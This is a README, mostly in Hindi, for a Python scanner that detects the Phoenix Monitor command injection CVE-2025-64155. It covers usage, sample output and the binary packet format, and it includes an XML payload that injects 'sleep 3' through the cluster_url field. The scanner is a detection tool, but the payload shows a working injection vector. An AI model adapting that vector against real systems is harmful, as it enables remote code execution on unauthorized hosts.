
CVE-2025-64155-हंटर
Phoenix Monitor सेवा में कमांड इंजेक्शन भेद्यता (CVE-2025-64155) का पता लगाने के लिए एक Python स्कैनर।
CVE-2025-64155 Phoenix Monitor सेवा में एक कमांड इंजेक्शन भेद्यता है जो handleStorageRequest कमांड (कमांड ID: 1075724911) में cluster_url पैरामीटर के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है।
यह भेद्यता तब उत्पन्न होती है जब cluster_url फ़ील्ड में उपयोगकर्ता-नियंत्रित इनपुट उचित स्वच्छता के बिना एक शेल कमांड को पास किया जाता है, जिससे शेल मेटाकैरेक्टर के माध्यम से कमांड इंजेक्शन की अनुमति मिलती है।
यह स्कैनर Horizon3AI द्वारा किए गए एक्सप्लॉइट शोध पर आधारित है।
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: लक्ष्य IP पता या होस्टनाम (आवश्यक)-p, --port: Phoenix Monitor सेवा पोर्ट (डिफ़ॉल्ट: 7900)--timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)-v, --verbose: विस्तृत आउटपुट सक्षम करें--check-only: केवल जाँचें कि सेवा सुलभ है या नहींस्कैनर एक समय-आधारित पहचान विधि का उपयोग करता है:
cluster_url फ़ील्ड में sleep 3 वाले दुर्भावनापूर्ण पेलोड के साथ एक handleStorageRequest कमांड भेजता हैयह विधि सुरक्षित और गैर-विनाशकारी है - यह हानिकारक कमांड नहीं चलाती, केवल पहचान के उद्देश्य से एक हानिरहित sleep कमांड चलाती है।
[*] CVE-2025-64155 स्कैनर
[*] लक्ष्य: 192.168.1.100:7900
[*] CVE-2025-64155 के लिए 192.168.1.100:7900 स्कैन किया जा रहा है...
[*] 192.168.1.100:7900 से जुड़ रहा है...
[*] सफलतापूर्वक जुड़ा
[*] परीक्षण पेलोड भेजा जा रहा है...
[*] 3.12 सेकंड में प्रतिक्रिया (1024 बाइट्स) प्राप्त हुई
============================================================
[+] असुरक्षित: लक्ष्य CVE-2025-64155 के प्रति असुरक्षित प्रतीत होता है
[+] विवरण: समय-आधारित पहचान: प्रतिक्रिया में 3.12 सेकंड की देरी (संभवतः कमांड इंजेक्शन)
[*] CVE-2025-64155 स्कैनर
[*] लक्ष्य: 192.168.1.100:7900
[*] CVE-2025-64155 के लिए 192.168.1.100:7900 स्कैन किया जा रहा है...
[*] 192.168.1.100:7900 से जुड़ रहा है...
[*] सफलतापूर्वक जुड़ा
[*] परीक्षण पेलोड भेजा जा रहा है...
[*] 0.45 सेकंड में प्रतिक्रिया (1024 बाइट्स) प्राप्त हुई
============================================================
[-] असुरक्षित नहीं: लक्ष्य असुरक्षित प्रतीत नहीं होता
[-] विवरण: तुरंत प्रतिक्रिया प्राप्त हुई (0.45s), संभवतः असुरक्षित नहीं
स्कैनर निम्नलिखित संरचना के साथ एक बाइनरी संदेश भेजता है:
[4 बाइट्स] संदेश लंबाई (156)
[4 बाइट्स] पेलोड लंबाई
[4 बाइट्स] कमांड ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 बाइट्स] पैडिंग/फ्लैग (0)
[चर] XML पेलोड
XML पेलोड में cluster_url फ़ील्ड में एक कमांड इंजेक्शन होता है:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है। इस उपकरण का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण करने की आपको स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।